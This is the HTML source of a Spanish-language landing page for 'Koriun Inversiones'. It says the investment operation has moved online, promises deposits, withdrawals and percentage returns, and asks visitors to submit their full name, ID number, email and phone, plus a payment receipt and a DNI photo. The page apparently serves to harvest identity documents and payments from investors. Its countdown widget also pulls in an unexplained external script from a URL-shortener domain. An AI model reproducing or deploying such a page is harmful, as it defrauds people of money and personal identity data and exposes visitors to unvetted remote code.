<!DOCTYPE html>
<html lang="en">
   <head>
      <!-- basic -->
      <meta charset="utf-8">
      <meta http-equiv="X-UA-Compatible" content="IE=edge">
      <!-- mobile metas -->
      <meta name="viewport" content="width=device-width, initial-scale=1">
      <meta name="viewport" content="initial-scale=1, maximum-scale=1">
      <!-- site metas -->
      <title>Koriun Inversiones</title>
      <meta name="keywords" content="">
      <meta name="description" content="">
      <meta name="author" content="">
      <!-- bootstrap css -->
      <link rel="stylesheet" href="css/bootstrap.min.css">
      <!-- style css -->
      <link rel="stylesheet" href="css/style.css">
      <!-- Responsive-->
      <link rel="stylesheet" href="css/responsive.css">
      <!-- fevicon -->
      <link rel="icon" href="images/Koriun logo.ico" type="image/gif" />
      <!-- Scrollbar Custom CSS -->
      <link rel="stylesheet" href="css/jquery.mCustomScrollbar.min.css">
      <!-- Tweaks for older IEs-->
      <link rel="stylesheet" href="https://netdna.bootstrapcdn.com/font-awesome/4.0.3/css/font-awesome.css">
      <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/fancybox/2.1.5/jquery.fancybox.min.css" media="screen">
      <!--[if lt IE 9]>
      <script src="https://oss.maxcdn.com/html5shiv/3.7.3/html5shiv.min.js"></script>
      <script src="https://oss.maxcdn.com/respond/1.4.2/respond.min.js"></script><![endif]-->
   </head>
   <!-- body -->
   <body class="main-layout">
      <!-- loader  -->
      <div class="loader_bg">
         <div class="loader"><img src="images/Loop.gif" alt="#" /></div>
      </div>
      <!-- end loader -->
     
      <!-- header -->
      <header>
         <!-- header inner -->
         <div class="header">
            <div class="container-fluid">
               <div class="row">
                  <div class="col-md-4 col-sm-4">
                     <div class="logo">

                        <center><b>¡Fecha estimada para censar!</b></center><div id="countdown"><div class="countdown-item countdown-item-days"><div class="countdown-number"></div><div class="countdown-item-label">Días</div></div><div class="countdown-item countdown-item-hours"><div class="countdown-number"></div><div class="countdown-item-label">Horas</div></div><div class="countdown-item countdown-item-minutes"><div class="countdown-number"></div><div class="countdown-item-label">Minutos</div></div><div class="countdown-item countdown-item-seconds"><div class="countdown-number"></div><div class="countdown-item-label">Segundos</div></div></div><script type="text/javascript" src="//acortar.org/gen-js"></script><script>const targetDate=new Date('JUNE 1, 2025 00:00:00').getTime();setInterval(()=>{const now=new Date().getTime();const difference=targetDate-now;const days=Math.floor(difference/(1000*60*60*24));const hours=Math.floor((difference%(1000*60*60*24))/(1000*60*60));const minutes=Math.floor((difference%(1000*60*60))/(1000*60));const seconds=Math.floor((difference%(1000*60))/1000);document.querySelector('.countdown-item-days .countdown-number').textContent=days;document.querySelector('.countdown-item-hours .countdown-number').textContent=hours;document.querySelector('.countdown-item-minutes .countdown-number').textContent=minutes;document.querySelector('.countdown-item-seconds .countdown-number').textContent=seconds},1000);</script><style>#countdown{display:flex;justify-content:center;align-items:center;font-size:15px;text-align:center;margin-top:20px;color:#fff}.countdown-item{display:inline-block;margin-right:10px;font-size:22px;background-color:#2196f3;border-radius:10px;padding:5px;color:#fff;box-shadow:0 0 10px 0 rgba(0, 0, 0, 0.2)}.countdown-item-label{font-size:10px;margin-top:5px;color:#fff}.countdown-item-days .countdown-item-label{display:block}</style>
                        
                     </div>
                  </div>
                  
                  </div>
               </div>
            </div>
         </div>
      </header>
      <!-- end header inner -->
      <!-- end header -->
      <!-- banner -->
      <section class="banner_main">
         <div id="banner1" class="carousel slide banner_slide" data-ride="">
            <ol class="carousel-indicators">
               <li data-target="#banner1" data-slide-to="0" class=""></li>
               
            </ol>
            <div class="carousel-inner">
               <div class="carousel-item active">
                  <div class="container-fluid">
                     <div class="carousel-caption">
                        <div class="row">
                           <div class="col-md-7 col-lg-5">
                              <div class="text-bg">
                                 <h1>¡Mejor empresa inversora!</h1>
                                 <span>Invierte con nosotros ahora, inicia tu futuro de manera digital..</span>
                                 
                              </div>
                           </div>
                           <div class="col-md-12 col-lg-7">
                              <div class="row">
                                 <div class="col-md-6">
                                    <div class="ban_track">
                                       <figure><img src="images/about.png" alt="#"/></figure>
                                    </div>
                                 </div>
                                 <div class="col-md-6">
                                    <form class="transfot">
                                       <div class="col-md-12">
                                          <span>¡Llena el formulario, es muy facil!</span>
                                          <h3>Registrate y envianos tus datos.</h3>
                                       </div>
                                       <div class="col-md-12">
                                          <input class="transfot_form" onkeypress="return soloLetras(event)" required minlength="20" maxlength="45" size="" placeholder="Nombre Completo" type="text" name="Location">
                                       </div>
                                       <div class="col-md-12">
                                          <input class="transfot_form" onkeypress="return soloNumeros(event)" required minlength="13" maxlength="13" size="" placeholder="Numero de Identidad" type="text" name="To destination">
                                       </div>
                                       <div class="col-md-12">
                                          <input required class="transfot_form" placeholder="Correo Electronico" type="email" name="Email">
                                       </div>
                                       <div class="col-md-12">
                                          <input class="transfot_form" onkeypress="return soloNumeros(event)" required minlength="8" maxlength="8" size="" placeholder="Numero de Telefono" type="text" name="Contact Number">
                                       </div>








                                       
                                       <div class="col-md-12">

                                          <label for="file">Adjunta el recibo de pago y una foto del DNI:</label>
                                          <input required type="file" accept="image/jpeg" multiple name="file" id="file" placeholder="Recibo de Pago" />
                                       
                           

                                          
                                           </div>
                                          
                                          
                                          
                                          
                                          
                                           <div class="col-md-12">
                                             ‎ ‎ ‎ 
                                          </div>
                                       
                                           <div class="col-md-12">
                                             <a href="https://www.youtube.com/" class="get_now"></a>
                                             <button class="get_now">Enviar</button></a>
                                             
                                          
                                          </div>
                                       
                                       </div>
                                       

                                       





                                       





                                     
                                    </form>  
                                 </div>
                              </div>
                           </div>
                        </div>
                     </div>
                  </div>
               </div>
               
         </div>
      </section>
      <!-- end banner -->
      <!-- about section -->
      <div id="about" class="about ">
         <div class="container">
            <div class="row d_flex">
               <div class="col-md-6">
                  <div class="about_right">
                     <figure><img src="images/99.jpg" alt="#"/></figure>
                  </div>
               </div>
               <div class="col-md-6">
                  <div class="titlepage">
                     <h2>¿Que sucedio con Koriun?</h2>
                     <p> Bueno, es sencillo, Koriun estaba generando mucha obstruccion, tanto en el paso peatonal y vehicular ademas de causar muchos estragos en la zona, hemos decidido cambiarnos a una plataforma digital mas apta y facil para ti, no tendras que esperar mas esas largas filas...
                     </p>
                     
                  </div>
               </div>
            </div>
         </div>
      </div>
      <!-- about section -->
      <!-- service section -->
      <div id="service" class="service">
         <div class="container">
            <div class="row">
               <div class="col-md-10 offset-md-1">
                  <div class="titlepage">
                     <h2>Nuestros Servicios</h2>
                     <p>Koriun ofrece una posibilidad de mejora muy amplia con respecto a como era antes</p>
                  </div>
               </div>
            </div>
            <div class="row">
               <div class="col-md-12">
                  <div class="service_main">
                     <div class="service_box blu_colo">
                        <i><img src="images/ser1.png" alt="#"/></i>
                        <h4>Rapidez en tus depositos y retiros</h4>
                     </div>
                     <div class="service_box yelldark_colo">
                        <i><img src="images/ser2.png" alt="#"/></i>
                        <h4>Transacciones a otros usuarios</h4>
                     </div>
                     <div class="service_box yell_colo">
                        <i><img src="images/ser3.png" alt="#"/></i>
                        <h4>Multicuenta en base a tu DNI</h4>
                     </div>
                     <div class="service_box yelldark_colo">
                        <i><img src="images/ser4.png" alt="#"/></i>
                        <h4>Billetera Virtual</h4>
                     </div>
                     <div class="service_box yell_colo">
                        <i><img src="images/ser5.png" alt="#"/></i>
                        <h4>100% seguro y facil de usar</h4>
                     </div>
                  </div>
               </div>
               <div class="col-md-12">
                  
               </div>
            </div>
         </div>
      </div>
      <!-- end service section -->
      <!-- vehicles section -->
      
      <!-- end vehicles section -->
      <!-- testimonial section -->
     
      <!-- choose section -->
      <div class="choose">
         <div class="container">
            <div class="row">
               <div class="col-md-12">
                  <div class="titlepage">
                     <h2>¿Porque Elegirnos?</h2>
                  </div>
               </div>
            </div>
            <div class="row">
               <div class="col-md-5">
                  <div class="choose_box">
                     <i><img src="images/why1.png" alt="#"/></i>
                     <h3>Nuestra Vision</h3>
                     <p>Una buena manera de que tu crezcas es invirtiendo y ahorrando tus finanzas, para lograr eso estamos dispuestos a llevarte hasta ese lugar deseado que tu quieres..</p>
                     
                  </div>
               </div>
               <div class="col-md-5 offset-md-2">
                  <div class="choose_box">
                     <i><img src="images/why2.png" alt="#"/></i>
                     <h3>Nuestra Mision</h3>
                     <p>Bueno a diferencia de la competencia, queremos ser los mas grande inversores autonomos de nuestro pais, llevando a Koriun hasta lo mas alto con nuestros porcentajes y cadena de mando..</p>
                     
                  </div>
               </div>
            </div>
         </div>
      </div>
      <!-- end choose section -->
      <!-- contact section -->
     
            <div class="copyright">
               <div class="container">
                  <div class="row">
                     <div class="col-md-12">
                        <p>©Koriun 2025 Todos los derechos reservados. </p>
                     </div>
                  </div>
               </div>
            </div>
         </div>
      </footer>
      <!-- end footer -->
      <!-- Javascript files-->
      <script src="js/jquery.min.js"></script>
      <script src="js/popper.min.js"></script>
      <script src="js/bootstrap.bundle.min.js"></script>
      <script src="js/jquery-3.0.0.min.js"></script>
      <!-- sidebar -->
      <script src="js/jquery.mCustomScrollbar.concat.min.js"></script>
      <script src="js/custom.js"></script>
      <script>
         function openNav() {
           document.getElementById("mySidepanel").style.width = "250px";
         }
         
         function closeNav() {
           document.getElementById("mySidepanel").style.width = "0";
         }
      </script>
   </body>
</html>

